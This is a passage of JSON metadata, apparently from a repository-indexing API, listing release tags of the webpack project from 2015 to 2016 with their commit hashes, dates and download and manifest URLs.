rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9